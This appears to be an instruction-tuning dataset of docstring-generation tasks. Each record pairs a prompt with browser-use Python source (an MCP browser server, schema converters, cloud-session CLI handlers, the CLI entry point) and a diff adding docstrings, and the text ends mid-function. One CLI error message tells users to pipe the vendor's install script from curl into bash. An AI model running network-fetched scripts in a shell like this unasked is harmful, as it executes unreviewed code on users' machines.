+ }
+ }
+ }
+"""
import os
import sys
@@ -35,6 +59,7 @@
def _configure_mcp_server_logging():
+ """Configure logging for MCP server mode - redirect all logs to stderr to prevent JSON RPC interference."""
# Set environment to suppress browser-use logging during server mode
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'warning'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false' # Prevent automatic logging setup
@@ -76,6 +101,7 @@
def _ensure_all_loggers_use_stderr():
+ """Ensure ALL loggers only output to stderr, not stdout."""
# Get the stderr handler
stderr_handler = None
for handler in logging.root.handlers:
@@ -128,6 +154,7 @@
def get_parent_process_cmdline() -> str | None:
+ """Get the command line of all parent processes up the chain."""
if not PSUTIL_AVAILABLE:
return None
@@ -158,6 +185,7 @@
class BrowserUseServer:
+ """MCP Server for browser-use capabilities."""
def __init__(self, session_timeout_minutes: int = 10):
# Ensure all logging goes to stderr (in case new loggers were created)
@@ -182,9 +210,11 @@ self._setup_handlers()
def _setup_handlers(self):
+ """Setup MCP server handlers."""
@self.server.list_tools()
async def handle_list_tools() -> list[types.Tool]:
+ """List all available browser-use tools."""
return [
# Agent tools
# Direct browser control tools
@@ -415,14 +445,17 @@
@self.server.list_resources()
async def handle_list_resources() -> list[types.Resource]:
+ """List available resources (none for browser-use)."""
return []
@self.server.list_prompts()
async def handle_list_prompts() -> list[types.Prompt]:
+ """List available prompts (none for browser-use)."""
return []
@self.server.call_tool()
async def handle_call_tool(name: str, arguments: dict[str, Any] | None) -> list[types.TextContent | types.ImageContent]:
+ """Handle tool execution."""
start_time = time.time()
error_msg = None
try:
@@ -450,6 +483,7 @@ async def _execute_tool(
self, tool_name: str, arguments: dict[str, Any]
) -> str | list[types.TextContent | types.ImageContent]:
+ """Execute a browser-use tool. Returns str for most tools, or a content list for tools with image output."""
# Agent-based tools
if tool_name == 'retry_with_browser_use_agent':
@@ -532,6 +566,7 @@ return f'Unknown tool: {tool_name}'
async def _init_browser_session(self, allowed_domains: list[str] | None = None, **kwargs):
+ """Initialize browser session using config"""
if self.browser_session:
return
@@ -604,6 +639,7 @@ allowed_domains: list[str] | None = None,
use_vision: bool = True,
) -> str:
+ """Run an autonomous agent task."""
logger.debug(f'Running agent task: {task}')
# Get LLM config
@@ -697,6 +733,7 @@ await agent.close()
async def _navigate(self, url: str, new_tab: bool = False) -> str:
+ """Navigate to a URL."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -721,6 +758,7 @@ coordinate_y: int | None = None,
new_tab: bool = False,
) -> str:
+ """Click an element by index or at viewport coordinates."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -784,6 +822,7 @@ return f'Clicked element {index}'
async def _type_text(self, index: int, text: str) -> str:
+ """Type text into an element."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -829,6 +868,7 @@ return f"Typed '{text}' into element {index}"
async def _get_browser_state(self, include_screenshot: bool = False) -> tuple[str, str | None]:
+ """Get current browser state. Returns (state_json, screenshot_b64 | None)."""
if not self.browser_session:
return 'Error: No browser session active', None
@@ -884,6 +924,7 @@ return json.dumps(result, indent=2), screenshot_b64
async def _get_html(self, selector: str | None = None) -> str:
+ """Get raw HTML of the page or a specific element."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -910,6 +951,7 @@ return html
async def _screenshot(self, full_page: bool = False) -> tuple[str, str | None]:
+ """Take a screenshot. Returns (metadata_json, screenshot_b64 | None)."""
if not self.browser_session:
return 'Error: No browser session active', None
@@ -933,6 +975,7 @@ return json.dumps(result), b64
async def _extract_content(self, query: str, extract_links: bool = False) -> str:
+ """Extract content from current page."""
if not self.llm:
return 'Error: LLM not initialized (set OPENAI_API_KEY)'
@@ -974,6 +1017,7 @@ return action_result.extracted_content or 'No content extracted'
async def _scroll(self, direction: str = 'down') -> str:
+ """Scroll the page."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -990,6 +1034,7 @@ return f'Scrolled {direction}'
async def _go_back(self) -> str:
+ """Go back in browser history."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1000,6 +1045,7 @@ return 'Navigated back'
async def _close_browser(self) -> str:
+ """Close the browser session."""
if self.browser_session:
from browser_use.browser.events import BrowserStopEvent
@@ -1011,6 +1057,7 @@ return 'No browser session to close'
async def _list_tabs(self) -> str:
+ """List all open tabs."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1021,6 +1068,7 @@ return json.dumps(tabs, indent=2)
async def _switch_tab(self, tab_id: str) -> str:
+ """Switch to a different tab."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1033,6 +1081,7 @@ return f'Switched to tab {tab_id}: {state.url}'
async def _close_tab(self, tab_id: str) -> str:
+ """Close a specific tab."""
if not self.browser_session:
return 'Error: No browser session active'
@@ -1045,6 +1094,7 @@ return f'Closed tab # {tab_id}, now on {current_url}'
def _track_session(self, session: BrowserSession) -> None:
+ """Track a browser session for management."""
self.active_sessions[session.id] = {
'session': session,
'created_at': time.time(),
@@ -1053,10 +1103,12 @@ }
def _update_session_activity(self, session_id: str) -> None:
+ """Update the last activity time for a session."""
if session_id in self.active_sessions:
self.active_sessions[session_id]['last_activity'] = time.time()
async def _list_sessions(self) -> str:
+ """List all active browser sessions."""
if not self.active_sessions:
return 'No active browser sessions'
@@ -1083,6 +1135,7 @@ return json.dumps(sessions_info, indent=2)
async def _close_session(self, session_id: str) -> str:
+ """Close a specific browser session."""
if session_id not in self.active_sessions:
return f'Session {session_id} not found'
@@ -1109,6 +1162,7 @@ return f'Error closing session {session_id}: {str(e)}'
async def _close_all_sessions(self) -> str:
+ """Close all active browser sessions."""
if not self.active_sessions:
return 'No active sessions to close'
@@ -1136,6 +1190,7 @@ return result
async def _cleanup_expired_sessions(self) -> None:
+ """Background task to clean up expired sessions."""
current_time = time.time()
timeout_seconds = self.session_timeout_minutes * 60
@@ -1153,6 +1208,7 @@ logger.error(f'Error auto-closing session {session_id}: {e}')
async def _start_cleanup_task(self) -> None:
+ """Start the background cleanup task."""
async def cleanup_loop():
while True:
@@ -1167,6 +1223,7 @@ self._cleanup_task = create_task_with_error_handling(cleanup_loop(), name='mcp_cleanup_loop', suppress_exceptions=True)
async def run(self):
+ """Run the MCP server."""
# Start the cleanup task
await self._start_cleanup_task()
@@ -1215,4 +1272,4 @@
if __name__ == '__main__':
- asyncio.run(main())+ asyncio.run(main())
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/mcp/server.py |
Expand my code with proper documentation strings |
from typing import Any
from pydantic import BaseModel, Field, create_model
from browser_use.skills.views import ParameterSchema
def convert_parameters_to_pydantic(parameters: list[ParameterSchema], model_name: str = 'SkillParameters') -> type[BaseModel]:
if not parameters:
# Return empty model if no parameters
return create_model(model_name, __base__=BaseModel)
fields: dict[str, Any] = {}
for param in parameters:
# Map parameter type string to Python types
python_type: Any = str # default
param_type = param.type
if param_type == 'string':
python_type = str
elif param_type == 'number':
python_type = float
elif param_type == 'boolean':
python_type = bool
elif param_type == 'object':
python_type = dict[str, Any]
elif param_type == 'array':
python_type = list[Any]
elif param_type == 'cookie':
python_type = str # Treat cookies as strings
# Check if parameter is required (defaults to True if not specified)
is_required = param.required if param.required is not None else True
# Make optional if not required
if not is_required:
python_type = python_type | None # type: ignore
# Create field with description
field_kwargs = {}
if param.description:
field_kwargs['description'] = param.description
if is_required:
fields[param.name] = (python_type, Field(**field_kwargs))
else:
fields[param.name] = (python_type, Field(default=None, **field_kwargs))
# Create and return the model
return create_model(model_name, __base__=BaseModel, **fields)
def convert_json_schema_to_pydantic(schema: dict[str, Any], model_name: str = 'SkillOutput') -> type[BaseModel]:
if not schema or 'properties' not in schema:
# Return empty model if no schema
return create_model(model_name, __base__=BaseModel)
fields: dict[str, Any] = {}
properties = schema.get('properties', {})
required_fields = set(schema.get('required', []))
for field_name, field_schema in properties.items():
# Get the field type
field_type_str = field_schema.get('type', 'string')
field_description = field_schema.get('description')
# Map JSON schema types to Python types
python_type: Any = str # default
if field_type_str == 'string':
python_type = str
elif field_type_str == 'number':
python_type = float
elif field_type_str == 'integer':
python_type = int
elif field_type_str == 'boolean':
python_type = bool
elif field_type_str == 'object':
python_type = dict[str, Any]
elif field_type_str == 'array':
# Check if items type is specified
items_schema = field_schema.get('items', {})
items_type = items_schema.get('type', 'string')
if items_type == 'string':
python_type = list[str]
elif items_type == 'number':
python_type = list[float]
elif items_type == 'integer':
python_type = list[int]
elif items_type == 'boolean':
python_type = list[bool]
elif items_type == 'object':
python_type = list[dict[str, Any]]
else:
python_type = list[Any]
# Make optional if not required
is_required = field_name in required_fields
if not is_required:
python_type = python_type | None # type: ignore
# Create field with description
field_kwargs = {}
if field_description:
field_kwargs['description'] = field_description
if is_required:
fields[field_name] = (python_type, Field(**field_kwargs))
else:
fields[field_name] = (python_type, Field(default=None, **field_kwargs))
# Create and return the model
return create_model(model_name, __base__=BaseModel, **fields) | --- +++ @@ -1,3 +1,4 @@+"""Utilities for skill schema conversion"""
from typing import Any
@@ -7,6 +8,15 @@
def convert_parameters_to_pydantic(parameters: list[ParameterSchema], model_name: str = 'SkillParameters') -> type[BaseModel]:
+ """Convert a list of ParameterSchema to a pydantic model for structured output
+
+ Args:
+ parameters: List of parameter schemas from the skill API
+ model_name: Name for the generated pydantic model
+
+ Returns:
+ A pydantic BaseModel class with fields matching the parameter schemas
+ """
if not parameters:
# Return empty model if no parameters
return create_model(model_name, __base__=BaseModel)
@@ -54,6 +64,19 @@
def convert_json_schema_to_pydantic(schema: dict[str, Any], model_name: str = 'SkillOutput') -> type[BaseModel]:
+ """Convert a JSON schema to a pydantic model
+
+ Args:
+ schema: JSON schema dictionary (OpenAPI/JSON Schema format)
+ model_name: Name for the generated pydantic model
+
+ Returns:
+ A pydantic BaseModel class matching the schema
+
+ Note:
+ This is a simplified converter that handles basic types.
+ For complex nested schemas, consider using datamodel-code-generator.
+ """
if not schema or 'properties' not in schema:
# Return empty model if no schema
return create_model(model_name, __base__=BaseModel)
@@ -114,4 +137,4 @@ fields[field_name] = (python_type, Field(default=None, **field_kwargs))
# Create and return the model
- return create_model(model_name, __base__=BaseModel, **fields)+ return create_model(model_name, __base__=BaseModel, **fields)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skills/utils.py |
Generate docstrings with examples | from typing import Generic, TypeVar, Union
from pydantic import BaseModel
T = TypeVar('T', bound=Union[BaseModel, str])
class ChatInvokeUsage(BaseModel):
prompt_tokens: int
"""The number of tokens in the prompt (this includes the cached tokens as well. When calculating the cost, subtract the cached tokens from the prompt tokens)"""
prompt_cached_tokens: int | None
"""The number of cached tokens."""
prompt_cache_creation_tokens: int | None
"""Anthropic only: The number of tokens used to create the cache."""
prompt_image_tokens: int | None
"""Google only: The number of tokens in the image (prompt tokens is the text tokens + image tokens in that case)"""
completion_tokens: int
"""The number of tokens in the completion."""
total_tokens: int
"""The total number of tokens in the response."""
class ChatInvokeCompletion(BaseModel, Generic[T]):
completion: T
"""The completion of the response."""
# Thinking stuff
thinking: str | None = None
redacted_thinking: str | None = None
usage: ChatInvokeUsage | None
"""The usage of the response."""
stop_reason: str | None = None
"""The reason the model stopped generating. Common values: 'end_turn', 'max_tokens', 'stop_sequence'.""" | --- +++ @@ -6,6 +6,9 @@
class ChatInvokeUsage(BaseModel):
+ """
+ Usage information for a chat model invocation.
+ """
prompt_tokens: int
"""The number of tokens in the prompt (this includes the cached tokens as well. When calculating the cost, subtract the cached tokens from the prompt tokens)"""
@@ -27,6 +30,9 @@
class ChatInvokeCompletion(BaseModel, Generic[T]):
+ """
+ Response from a chat model invocation.
+ """
completion: T
"""The completion of the response."""
@@ -39,4 +45,4 @@ """The usage of the response."""
stop_reason: str | None = None
- """The reason the model stopped generating. Common values: 'end_turn', 'max_tokens', 'stop_sequence'."""+ """The reason the model stopped generating. Common values: 'end_turn', 'max_tokens', 'stop_sequence'."""
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/views.py |
Document classes and their methods |
import argparse
import json
import logging
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Any
from browser_use_sdk.types.session_item_view import SessionItemView
from browser_use_sdk.types.session_view import SessionView
from browser_use_sdk.types.share_view import ShareView
from browser_use.skill_cli.commands.utils import format_duration, get_sdk_client
logger = logging.getLogger(__name__)
# ============ SDK Wrappers ============
def create_session(**kwargs: Any) -> SessionItemView:
# Map our param names to SDK param names
param_map = {
'proxy_country': 'proxy_country_code',
'screen_width': 'browser_screen_width',
'screen_height': 'browser_screen_height',
}
params = {}
for k, v in kwargs.items():
if v is not None:
params[param_map.get(k, k)] = v
return get_sdk_client().sessions.create_session(**params)
def list_sessions(limit: int = 10, status: str | None = None) -> list[SessionItemView]:
client = get_sdk_client()
response = client.sessions.list_sessions(
page_size=min(limit, 100),
filter_by=status,
)
return list(response.items) if response.items else []
def get_session(session_id: str) -> SessionView:
return get_sdk_client().sessions.get_session(session_id)
def stop_session(session_id: str) -> SessionView:
return get_sdk_client().sessions.update_session(session_id, action='stop')
def delete_session(session_id: str) -> None:
get_sdk_client().sessions.delete_session(session_id)
def create_public_share(session_id: str) -> ShareView:
return get_sdk_client().sessions.create_session_public_share(session_id)
def delete_public_share(session_id: str) -> None:
get_sdk_client().sessions.delete_session_public_share(session_id)
def stop_sessions_parallel(session_ids: list[str]) -> tuple[list[str], list[dict[str, Any]]]:
client = get_sdk_client()
stopped: list[str] = []
errors: list[dict[str, Any]] = []
def stop_one(sid: str) -> tuple[str, str | None]:
try:
client.sessions.update_session(sid, action='stop')
return (sid, None)
except Exception as e:
return (sid, str(e))
with ThreadPoolExecutor(max_workers=10) as executor:
futures = {executor.submit(stop_one, sid): sid for sid in session_ids}
for future in as_completed(futures):
sid, error = future.result()
if error:
errors.append({'id': sid, 'error': error})
else:
stopped.append(sid)
return stopped, errors
# ============ CLI Handlers ============
def handle_session_command(args: argparse.Namespace) -> int:
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
# Check if remote mode is available
if not is_mode_available('remote'):
print(
'Error: Session management requires remote mode.\n'
'Remote mode is not installed. Reinstall to enable:\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --remote-only\n'
' curl -fsSL https://browser-use.com/cli/install.sh | bash -s -- --full',
file=sys.stderr,
)
return 1
# Check API key
try:
require_api_key('Cloud sessions')
except APIKeyRequired as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if args.session_command == 'list':
return _handle_list(args)
elif args.session_command == 'get':
return _handle_get(args)
elif args.session_command == 'stop':
return _handle_stop(args)
elif args.session_command == 'create':
return _handle_create(args)
elif args.session_command == 'share':
return _handle_share(args)
else:
print('Usage: browser-use session <command>')
print('Commands: list, get <id>, stop <id>, create, share <id>')
return 1
# ============ CLI Helper Functions ============
def _session_to_dict(session: Any) -> dict[str, Any]:
return {
'id': session.id,
'status': session.status,
'liveUrl': session.live_url,
'startedAt': session.started_at.isoformat() if session.started_at else None,
'finishedAt': session.finished_at.isoformat() if session.finished_at else None,
'keepAlive': session.keep_alive,
'persistMemory': getattr(session, 'persist_memory', None),
'proxyCost': session.proxy_cost,
'publicShareUrl': getattr(session, 'public_share_url', None),
}
def _handle_list(args: argparse.Namespace) -> int:
try:
status_filter = getattr(args, 'status', None)
sessions = list_sessions(limit=args.limit, status=status_filter)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps([_session_to_dict(s) for s in sessions]))
else:
if not sessions:
status_msg = f' with status "{status_filter}"' if status_filter else ''
print(f'No sessions found{status_msg}')
else:
header = f'Sessions ({len(sessions)})'
if status_filter:
header = f'{status_filter.capitalize()} sessions ({len(sessions)})'
print(f'{header}:')
for s in sessions:
session_id = s.id or 'unknown'
status = s.status or 'unknown'
live_url = s.live_url
started_at = s.started_at
finished_at = s.finished_at
keep_alive = '🔄' if s.keep_alive else ''
# Status emoji
status_emoji = {
'active': '🟢',
'stopped': '⏹️',
}.get(status, '❓')
# Truncate ID for display
short_id = session_id[:8] + '...' if len(session_id) > 8 else session_id
# Build line with duration
duration = format_duration(started_at, finished_at)
line = f' {status_emoji} {short_id} [{status}]'
if duration:
line += f' {duration}'
if keep_alive:
line += f' {keep_alive}'
if live_url and status == 'active':
line += f'\n live: {live_url}'
print(line)
return 0
def _handle_get(args: argparse.Namespace) -> int:
try:
session = get_session(args.session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps(_session_to_dict(session)))
else:
session_id = session.id or args.session_id
status = session.status or 'unknown'
live_url = session.live_url
started_at = session.started_at
finished_at = session.finished_at
keep_alive = session.keep_alive
proxy_cost = session.proxy_cost
public_share_url = getattr(session, 'public_share_url', None)
# Status emoji
status_emoji = {
'active': '🟢',
'stopped': '⏹️',
}.get(status, '❓')
# Build header with duration
duration = format_duration(started_at, finished_at)
header_parts = [f'{status_emoji} {session_id[:8]}... [{status}]']
if duration:
header_parts.append(duration)
if proxy_cost:
# Format proxy cost to 2 decimal places
try:
cost_val = float(proxy_cost)
header_parts.append(f'${cost_val:.2f}')
except (ValueError, TypeError):
header_parts.append(f'${proxy_cost}')
print(' '.join(header_parts))
if keep_alive:
print(' Keep Alive: Yes')
if live_url:
print(f' Live URL: {live_url}')
if public_share_url:
print(f' Public Share: {public_share_url}')
return 0
def _handle_stop(args: argparse.Namespace) -> int:
# Handle --all flag
if getattr(args, 'all', False):
return _handle_stop_all(args)
try:
stop_session(args.session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'stopped': args.session_id}))
else:
print(f'Stopped session: {args.session_id}')
return 0
def _handle_stop_all(args: argparse.Namespace) -> int:
try:
# Get all active sessions
sessions = list_sessions(limit=100, status='active')
except Exception as e:
print(f'Error listing sessions: {e}', file=sys.stderr)
return 1
if not sessions:
print('No active sessions to stop')
return 0
# Extract session IDs
session_ids = [s.id for s in sessions if s.id]
if not session_ids:
print('No active sessions to stop')
return 0
# Stop all sessions in parallel
stopped, errors = stop_sessions_parallel(session_ids)
if getattr(args, 'json', False):
print(json.dumps({'stopped': stopped, 'errors': errors}))
else:
if stopped:
print(f'Stopped {len(stopped)} session(s):')
for sid in stopped:
print(f' ✓ {sid[:8]}...')
if errors:
print(f'Failed to stop {len(errors)} session(s):')
for err in errors:
print(f' ✗ {err["id"][:8]}...: {err["error"]}')
return 0 if not errors else 1
def _handle_create(args: argparse.Namespace) -> int:
# Parse screen size if provided
screen_width = None
screen_height = None
if hasattr(args, 'screen_size') and args.screen_size:
try:
w, h = args.screen_size.lower().split('x')
screen_width = int(w)
screen_height = int(h)
except ValueError:
print('Error: Invalid screen size format. Use WxH (e.g., 1920x1080)', file=sys.stderr)
return 1
try:
session = create_session(
profile_id=getattr(args, 'profile', None),
proxy_country=getattr(args, 'proxy_country', None),
keep_alive=getattr(args, 'keep_alive', None),
persist_memory=getattr(args, 'persist_memory', None),
start_url=getattr(args, 'start_url', None),
screen_width=screen_width,
screen_height=screen_height,
)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps(_session_to_dict(session)))
else:
print(f'Created session: {session.id}')
if session.live_url:
print(f' Live URL: {session.live_url}')
return 0
def _handle_share(args: argparse.Namespace) -> int:
session_id = args.session_id
# Delete share if requested
if getattr(args, 'delete', False):
try:
delete_public_share(session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(json.dumps({'deleted': session_id}))
else:
print(f'Deleted public share for session: {session_id}')
return 0
# Create share
try:
share = create_public_share(session_id)
except Exception as e:
print(f'Error: {e}', file=sys.stderr)
return 1
if getattr(args, 'json', False):
print(
json.dumps(
{
'sessionId': session_id,
'url': share.share_url,
'shareToken': share.share_token,
'viewCount': share.view_count,
}
)
)
else:
print(f'Public share created for session: {session_id}')
if share.share_url:
print(f' URL: {share.share_url}')
return 0 | --- +++ @@ -1,3 +1,9 @@+"""Cloud session SDK wrappers and CLI handlers.
+
+This module provides:
+- SDK wrapper functions for the Browser-Use Cloud Session API
+- CLI command handlers for `browser-use session <command>`
+"""
import argparse
import json
@@ -19,6 +25,20 @@
def create_session(**kwargs: Any) -> SessionItemView:
+ """Create a cloud browser session.
+
+ Args:
+ profile_id: Cloud profile ID for persistent auth/cookies
+ proxy_country: Proxy country code (us, gb, de, etc.)
+ keep_alive: Keep session alive after task completes
+ persist_memory: Share memory between tasks in session
+ start_url: URL to navigate to when session starts
+ screen_width: Browser screen width in pixels
+ screen_height: Browser screen height in pixels
+
+ Returns:
+ SessionItemView with session details
+ """
# Map our param names to SDK param names
param_map = {
'proxy_country': 'proxy_country_code',
@@ -34,6 +54,7 @@
def list_sessions(limit: int = 10, status: str | None = None) -> list[SessionItemView]:
+ """List cloud browser sessions."""
client = get_sdk_client()
response = client.sessions.list_sessions(
page_size=min(limit, 100),
@@ -43,26 +64,32 @@
def get_session(session_id: str) -> SessionView:
+ """Get details of a specific session."""
return get_sdk_client().sessions.get_session(session_id)
def stop_session(session_id: str) -> SessionView:
+ """Stop a cloud session."""
return get_sdk_client().sessions.update_session(session_id, action='stop')
def delete_session(session_id: str) -> None:
+ """Delete a cloud session and all its tasks."""
get_sdk_client().sessions.delete_session(session_id)
def create_public_share(session_id: str) -> ShareView:
+ """Create a public share URL for a session."""
return get_sdk_client().sessions.create_session_public_share(session_id)
def delete_public_share(session_id: str) -> None:
+ """Delete the public share for a session."""
get_sdk_client().sessions.delete_session_public_share(session_id)
def stop_sessions_parallel(session_ids: list[str]) -> tuple[list[str], list[dict[str, Any]]]:
+ """Stop multiple cloud sessions in parallel."""
client = get_sdk_client()
stopped: list[str] = []
errors: list[dict[str, Any]] = []
@@ -90,6 +117,16 @@
def handle_session_command(args: argparse.Namespace) -> int:
+ """Handle session subcommands.
+
+ Session commands manage cloud sessions and always require the cloud API.
+
+ Args:
+ args: Parsed command-line arguments
+
+ Returns:
+ Exit code (0 for success, 1 for error)
+ """
from browser_use.skill_cli.api_key import APIKeyRequired, require_api_key
from browser_use.skill_cli.install_config import is_mode_available
@@ -131,6 +168,7 @@
def _session_to_dict(session: Any) -> dict[str, Any]:
+ """Convert SDK session object to dict for JSON output."""
return {
'id': session.id,
'status': session.status,
@@ -145,6 +183,7 @@
def _handle_list(args: argparse.Namespace) -> int:
+ """Handle 'session list' command."""
try:
status_filter = getattr(args, 'status', None)
sessions = list_sessions(limit=args.limit, status=status_filter)
@@ -195,6 +234,7 @@
def _handle_get(args: argparse.Namespace) -> int:
+ """Handle 'session get <session_id>' command."""
try:
session = get_session(args.session_id)
except Exception as e:
@@ -244,6 +284,7 @@
def _handle_stop(args: argparse.Namespace) -> int:
+ """Handle 'session stop <session_id>' command."""
# Handle --all flag
if getattr(args, 'all', False):
return _handle_stop_all(args)
@@ -263,6 +304,7 @@
def _handle_stop_all(args: argparse.Namespace) -> int:
+ """Handle 'session stop --all' command."""
try:
# Get all active sessions
sessions = list_sessions(limit=100, status='active')
@@ -300,6 +342,7 @@
def _handle_create(args: argparse.Namespace) -> int:
+ """Handle 'session create' command."""
# Parse screen size if provided
screen_width = None
screen_height = None
@@ -337,6 +380,7 @@
def _handle_share(args: argparse.Namespace) -> int:
+ """Handle 'session share <session_id>' command."""
session_id = args.session_id
# Delete share if requested
@@ -376,4 +420,4 @@ if share.share_url:
print(f' URL: {share.share_url}')
- return 0+ return 0
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/cloud_session.py |
Generate docstrings with parameter types | #!/usr/bin/env python3
import argparse
import asyncio
import hashlib
import json
import os
import socket
import subprocess
import sys
import tempfile
import time
from pathlib import Path
# =============================================================================
# Early command interception (before heavy imports)
# These commands don't need the session server infrastructure
# =============================================================================
# Handle --mcp flag early to prevent logging initialization
if '--mcp' in sys.argv:
import logging
os.environ['BROWSER_USE_LOGGING_LEVEL'] = 'critical'
os.environ['BROWSER_USE_SETUP_LOGGING'] = 'false'
logging.disable(logging.CRITICAL)
import asyncio
from browser_use.mcp.server import main as mcp_main
asyncio.run(mcp_main())
sys.exit(0)
# Helper to find the subcommand (first non-flag argument)
def _get_subcommand() -> str | None:
for arg in sys.argv[1:]:
if not arg.startswith('-'):
return arg
return None
# Handle 'install' command - installs Chromium browser + system dependencies
if _get_subcommand() == 'install':
import platform
print('📦 Installing Chromium browser + system dependencies...')
print('⏳ This may take a few minutes...\n')
# Build command - only use --with-deps on Linux (it fails on Windows/macOS)
cmd = ['uvx', 'playwright', 'install', 'chromium']
if platform.system() == 'Linux':
cmd.append('--with-deps')
cmd.append('--no-shell')
result = subprocess.run(cmd)
if result.returncode == 0:
print('\n✅ Installation complete!')
print('🚀 Ready to use! Run: uvx browser-use')
else:
print('\n❌ Installation failed')
sys.exit(1)
sys.exit(0)
# Handle 'init' command - generate template files
# Uses _get_subcommand() to check if 'init' is the actual subcommand,
# not just anywhere in argv (prevents hijacking: browser-use run "init something")
if _get_subcommand() == 'init':
from browser_use.init_cmd import main as init_main
# Check if --template or -t flag is present without a value
# If so, just remove it and let init_main handle interactive mode
if '--template' in sys.argv or '-t' in sys.argv:
try:
template_idx = sys.argv.index('--template') if '--template' in sys.argv else sys.argv.index('-t')
template = sys.argv[template_idx + 1] if template_idx + 1 < len(sys.argv) else None
# If template is not provided or is another flag, remove the flag and use interactive mode
if not template or template.startswith('-'):
if '--template' in sys.argv:
sys.argv.remove('--template')
else:
sys.argv.remove('-t')
except (ValueError, IndexError):
pass
# Remove 'init' from sys.argv so click doesn't see it as an unexpected argument
sys.argv.remove('init')
init_main()
sys.exit(0)
# Handle --template flag directly (without 'init' subcommand)
# Delegate to init_main() which handles full template logic (directories, manifests, etc.)
if '--template' in sys.argv:
from browser_use.init_cmd import main as init_main
# Build clean argv for init_main: keep only init-relevant flags
new_argv = [sys.argv[0]] # program name
i = 1
while i < len(sys.argv):
arg = sys.argv[i]
# Keep --template/-t and its value
if arg in ('--template', '-t'):
new_argv.append(arg)
if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-'):
new_argv.append(sys.argv[i + 1])
i += 1
# Keep --output/-o and its value
elif arg in ('--output', '-o'):
new_argv.append(arg)
if i + 1 < len(sys.argv) and not sys.argv[i + 1].startswith('-'):
new_argv.append(sys.argv[i + 1])
i += 1
# Keep --force/-f and --list/-l flags
elif arg in ('--force', '-f', '--list', '-l'):
new_argv.append(arg)
# Skip other flags (--session, --browser, --headed, etc.)
i += 1
sys.argv = new_argv
init_main()
sys.exit(0)
# =============================================================================
# Utility functions (inlined to avoid imports)
# =============================================================================
def get_socket_path(session: str) -> str:
if sys.platform == 'win32':
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
port = 49152 + (int(hashlib.md5(session.encode()).hexdigest()[:4], 16) % 16383)
return f'tcp://127.0.0.1:{port}'
return str(Path(tempfile.gettempdir()) / f'browser-use-{session}.sock')
def get_pid_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def _pid_exists(pid: int) -> bool:
if sys.platform == 'win32':
import ctypes
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
if handle:
ctypes.windll.kernel32.CloseHandle(handle)
return True
return False
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def is_server_running(session: str) -> bool:
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
try:
pid = int(pid_path.read_text().strip())
return _pid_exists(pid)
except (OSError, ValueError):
# Can't read PID file or invalid PID
return False
def connect_to_server(session: str, timeout: float = 60.0) -> socket.socket:
sock_path = get_socket_path(session)
if sock_path.startswith('tcp://'):
# Windows: TCP connection
_, hostport = sock_path.split('://', 1)
host, port = hostport.split(':')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((host, int(port)))
else:
# Unix socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect(sock_path)
return sock
def get_session_metadata_path(session: str) -> Path:
return Path(tempfile.gettempdir()) / f'browser-use-{session}.meta'
def ensure_server(session: str, browser: str, headed: bool, profile: str | None, api_key: str | None) -> bool:
from browser_use.skill_cli.utils import is_session_locked, kill_orphaned_server
meta_path = get_session_metadata_path(session)
# Check if server is already running AND holding its lock (healthy server)
if is_server_running(session) and is_session_locked(session):
try:
sock = connect_to_server(session, timeout=0.5) # Increased from 0.1s
sock.close()
# Check browser mode matches existing session
if meta_path.exists():
try:
meta = json.loads(meta_path.read_text())
existing_mode = meta.get('browser_mode', 'chromium')
if existing_mode != browser:
# Only error if user explicitly requested 'remote' but session is local
# This prevents losing cloud features (live_url, etc.)
# The reverse case (requesting local but having remote) is fine -
# user still gets a working browser, just with more features
if browser == 'remote' and existing_mode != 'remote':
print(
f"Error: Session '{session}' is running with --browser {existing_mode}, "
f'but --browser remote was requested.\n\n'
f'Cloud browser features (live_url) require a remote session.\n\n'
f'Options:\n'
f' 1. Close and restart: browser-use close && browser-use --browser remote open <url>\n'
f' 2. Use different session: browser-use --browser remote --session other <command>\n'
f' 3. Use existing local browser: browser-use --browser {existing_mode} <command>',
file=sys.stderr,
)
sys.exit(1)
except (json.JSONDecodeError, OSError):
pass # Metadata file corrupt, ignore
return False # Already running with correct mode
except Exception:
pass # Server not responsive, continue to restart logic
# Kill any orphaned server (has PID file but no lock)
kill_orphaned_server(session)
# Build server command
cmd = [
sys.executable,
'-m',
'browser_use.skill_cli.server',
'--session',
session,
'--browser',
browser,
]
if headed:
cmd.append('--headed')
if profile:
